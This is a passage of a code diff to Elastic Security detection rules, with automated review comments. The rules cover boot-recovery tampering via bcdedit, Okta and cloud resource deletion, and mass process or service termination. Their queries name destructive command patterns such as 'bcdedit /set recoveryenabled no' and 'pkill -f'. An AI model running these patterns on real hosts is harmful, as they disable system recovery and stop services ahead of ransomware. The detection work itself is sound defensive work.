Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"bcdedit.exe\" or process.pe.original_file_name == \"bcdedit.exe\") and\n (\n (process.args : \"/set\" and process.args : \"bootstatuspolicy\" and process.args : \"ignoreallfailures\") or\n (process.args : \"no\" and process.args : \"recoveryenabled\")\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "69c251fb-a5d6-4035-b5ec-40438bd829ff", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 11 + "version": 13 } 
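Review bot: In the regrouped `query` the two argument branches are not symmetric: the `bootstatuspolicy` / `ignoreallfailures` branch additionally requires `process.args : "/set"`, while the `process.args : "no" and process.args : "recoveryenabled"` branch does not, so the same invocation style is treated differently by the two alternatives. Either add `process.args : "/set" and` to the second branch or drop it from the first and rely on the value tokens alone; the inconsistency predates this change, but the rewrite of the field is the right moment to settle it. The outer parentheses now correctly bind the `event.type` and `bcdedit.exe` constraints to both branches, which the old `and ... or` precedence did not, and `required_fields` lists all four fields the query reads.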
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json similarity index 58% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json index 2c3512fb2ad77..866cc46f5160a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_deactivate_okta_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_deactivate_okta_application.json 
@@ -13,15 +13,34 @@
 "language": "kuery",
 "license": "Elastic License v2",
 "name": "Attempt to Deactivate an Okta Application",
- "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
+ "note": "",
 "query": "event.dataset:okta.system and event.action:application.lifecycle.deactivate\n",
 "references": [
 "https://help.okta.com/en/prod/Content/Topics/Apps/Apps_Apps.htm",
 "https://developer.okta.com/docs/reference/api/system-log/",
 "https://developer.okta.com/docs/reference/api/event-types/"
 ],
+ "related_integrations": [
+ {
+ "package": "okta",
+ "version": "1.3.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.dataset",
+ "type": "keyword"
+ }
+ ],
 "risk_score": 21,
 "rule_id": "edb91186-1c7e-4db8-b53e-bfa33a1a0a8a",
+ "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
 "severity": "low",
 "tags": [
 "Elastic",
@@ -29,9 +48,27 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Monitoring"
+ "Monitoring",
+ "Impact"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0040",
+ "name": "Impact",
+ "reference": "https://attack.mitre.org/tactics/TA0040/"
+ },
+ "technique": [
+ {
+ "id": "T1489",
+ "name": "Service Stop",
+ "reference": "https://attack.mitre.org/techniques/T1489/"
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
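Review bot: The `note` field is left as an empty string (`+ "note": "",`) once its `## Config` text moves to `setup`, so this rule now ships with no investigation guide, and an empty string is indistinguishable from one that was deliberately blanked. Either drop the key or give analysts a short triage note, e.g. `"note": "## Triage and analysis\n\nConfirm with the Okta administrator whether the application lifecycle change was planned, and review the actor's other Okta system-log events in the same window."` as a single JSON string like the other rules. The same empty `note` appears in the Okta delete, modify and DoS rules, the three RDS rules, and the Azure resource-group and virtual-network rules further down this diff. Relatedly, the modify rule's new `threat` entry carries `"technique": []`; that is probably intentional since no Impact technique matches a configuration update, but a tactic with no technique is easy to mistake for an unfinished mapping, so a word on it in the PR description would help.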
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json similarity index 56% rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json index 4f18d2496e874..236fdc6a824f4 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_delete_okta_application.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_delete_okta_application.json @@ -13,14 +13,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Delete an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:application.lifecycle.delete\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "d48e1c13-4aca-4d1f-a7b1-a9161c0ad86f", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
@@ -28,9 +47,27 @@
 "Okta",
 "Continuous Monitoring",
 "SecOps",
- "Monitoring"
+ "Monitoring",
+ "Impact"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0040",
+ "name": "Impact",
+ "reference": "https://attack.mitre.org/tactics/TA0040/"
+ },
+ "technique": [
+ {
+ "id": "T1489",
+ "name": "Service Stop",
+ "reference": "https://attack.mitre.org/techniques/T1489/"
+ }
+ ]
+ }
 ],
 "timestamp_override": "event.ingested",
 "type": "query",
- "version": 4
+ "version": 6
 }
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json
similarity index 62%
rename from x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json
rename to x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json
index 3c0524749eed9..5bc28de21abfe 100644
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/okta_attempt_to_modify_okta_application.json
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_okta_attempt_to_modify_okta_application.json
@@ -13,15 +13,34 @@ "language": "kuery", "license": "Elastic License v2", "name": "Attempt to Modify an Okta Application", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:application.lifecycle.update\n", "references": [ "https://help.okta.com/en/prod/Content/Topics/Apps/Apps_Apps.htm", "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "c74fd275-ab2c-4d49-8890-e2943fa65c09", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -29,9 +48,21 @@ "Okta", "Continuous Monitoring", "SecOps", - "Monitoring" + "Monitoring", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [] + } ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json index 7372eb0e0286b..26eebdce60aec 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_possible_okta_dos_attack.json @@ -10,14 +10,33 @@ "language": "kuery", "license": "Elastic License v2", "name": "Possible Okta DoS Attack", - "note": "## Config\n\nThe Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:okta.system and event.action:(application.integration.rate_limit_exceeded or system.org.rate_limit.warning or system.org.rate_limit.violation or core.concurrency.org.limit.violation)\n", "references": [ "https://developer.okta.com/docs/reference/api/system-log/", "https://developer.okta.com/docs/reference/api/event-types/" ], + "related_integrations": [ + { + "package": "okta", + "version": "1.3.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "e6e3ecff-03dd-48ec-acbd-54a04de10c68", + "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -51,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json new file mode 100644 index 0000000000000..4babca6c1368f --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_process_kill_threshold.json 
@@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule identifies a high number (10) of process terminations via pkill from the same host within a short time period.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "High Number of Process Terminations", + "note": "## Triage and analysis\n\n### Investigating High Number of Process Terminations\n\nAttackers can kill processes for a variety of purposes. For example, they can kill process associated\nwith business applications and databases to release the lock on files used by these applications so they may be\nencrypted,or stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of process terminations via pkill from the same\nhost within a short time period.\n\n#### Possible investigation steps\n\nDetection alerts from this rule indicate High Number of Process Terminations from the same host\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the process termination(s) via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the process killed during the malicious execution\n - Identify imment threat to the system from the process killed\n - Take necessary incident response actions to respawn necessary process\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "query": "event.category:process and event.type:start and process.name:\"pkill\" and process.args:\"-f\"\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "67f8443a-4ff3-4a70-916d-3cfa3ae9f02b", + "severity": "medium", + "tags": [ + "Elastic", + "Host", + "Linux", + "Threat Detection", + "Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + 
"technique": [ + { + "id": "T1489", + "name": "Service Stop", + "reference": "https://attack.mitre.org/techniques/T1489/" + } + ] + } + ], + "threshold": { + "field": [ + "host.id" + ], + "value": 10 + }, + "type": "threshold", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json index 5f13c9ca2ecb8..d508b926a7926 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_group_deletion.json @@ -16,13 +16,43 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Security Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:DeleteDBSecurityGroup and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBSecurityGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "863cdf31-7fd3-41cf-a185-681237ea277b", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", 
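Review bot: The `description` and the `note` of the new impact_process_kill_threshold.json say the rule counts "process terminations", but the query (`event.category:process and event.type:start and process.name:"pkill" and process.args:"-f"`) with `"threshold": {"field": ["host.id"], "value": 10}` counts pkill process starts per host, not processes ended — one invocation may end many processes and ten may end none. Reword to what is actually measured, e.g. `"description": "This rule identifies a high number (10) of pkill -f invocations from the same host within a short time period, which may indicate mass process termination."`, and align the second paragraph of the note with it. The note also has wording errors worth fixing before it reaches analysts: `suspricous` → `suspicious`, `imment` → `imminent`, `encrypted,or` → `encrypted, or`, and `respawn necessary process` → `restart the affected processes`. The structure otherwise mirrors impact_stop_process_service_threshold.json, which is the right model for this rule.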
@@ -51,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json index 64c28c5033d9f..6fce76388e209 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_deletion.json @@ -15,8 +15,8 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Deletion of RDS Instance or Cluster", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance) \nand event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance)\nand event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/delete-db-cluster.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBCluster.html", 
@@ -25,8 +25,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/delete-db-instance.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "9055ece6-2689-4224-a0e0-b04881e1f8ad", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -55,5 +85,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 9 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json index e35a0c145ac59..98ed1be474e2a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_rds_instance_cluster_stoppage.json 
@@ -15,7 +15,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS RDS Instance/Cluster Stoppage", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:(StopDBCluster or StopDBInstance) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-cluster.html", @@ -23,8 +23,38 @@ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/rds/stop-db-instance.html", "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_StopDBInstance.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ecf2b32c-e221-4bd4-aa3b-c7d59b3bc01d", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json index 16153a832dcb9..d9df9894361a5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_resource_group_deletion.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Resource Group Deletion", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.RESOURCES/SUBSCRIPTIONS/RESOURCEGROUPS/DELETE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/azure-resource-manager/management/manage-resource-groups-portal" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "bb4fe8d2-7ae2-475c-8b5d-55b449e4264f", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -71,5 +96,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json index 36a30f51beab0..ce6abad33f97e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_stop_process_service_threshold.json 
@@ -14,6 +14,28 @@ "name": "High Number of Process and/or Service Terminations", "note": "## Triage and analysis\n\n### Investigating High Number of Process and/or Service Terminations\n\nAttackers can stop services and kill processes for a variety of purposes. For example, they can stop services associated\nwith business applications and databases to release the lock on files used by these applications so they may be encrypted,\nor stop security and backup solutions, etc.\n\nThis rule identifies a high number (10) of service and/or process terminations (stop, delete, or suspend) from the same\nhost within a short time period.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if any files on the host machine have been encrypted.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Reimage the host operating system or restore it to the operational state.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look\nfor ransomware preparation and execution activities.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "event.category:process and event.type:start and process.name:(net.exe or sc.exe or taskkill.exe) and\n process.args:(stop or pause or delete or \"/PID\" or \"/IM\" or \"/T\" or \"/F\" or \"/t\" or \"/f\" or \"/im\" or \"/pid\")\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "035889c4-2686-4583-a7df-67f89c292f2c", "severity": "medium", @@ -48,5 +70,5 @@ "value": 10 }, "type": "threshold", - "version": 5 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json index bf988e5dd1e0c..538f4dd0e4b4f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json 
+++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_virtual_network_device_modified.json 
@@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Virtual Network Device Modified or Deleted", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\" or\n\"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\" or \"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\" or \"MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\" or \"MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\") and \nevent.outcome:(Success or success)\n", + "note": "", + "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:(\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/TAPCONFIGURATIONS/DELETE\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/WRITE\" or\n\"MICROSOFT.NETWORK/NETWORKINTERFACES/JOIN/ACTION\" or \"MICROSOFT.NETWORK/NETWORKINTERFACES/DELETE\" or\n\"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/DELETE\" or \"MICROSOFT.NETWORK/NETWORKVIRTUALAPPLIANCES/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALHUBS/DELETE\" or \"MICROSOFT.NETWORK/VIRTUALHUBS/WRITE\" or\n\"MICROSOFT.NETWORK/VIRTUALROUTERS/WRITE\" or \"MICROSOFT.NETWORK/VIRTUALROUTERS/DELETE\") and\nevent.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + 
"name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "573f6e7a-7acf-4bcd-ad42-c4969124d3c0", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -28,7 +53,8 @@ "Azure", "Continuous Monitoring", "SecOps", - "Network Security" + "Network Security", + "Impact" ], "threat": [ { @@ -43,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json index 6e53615324f82..6a42b0dde861c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/impact_volume_shadow_copy_deletion_or_resized_via_vssadmin.json 
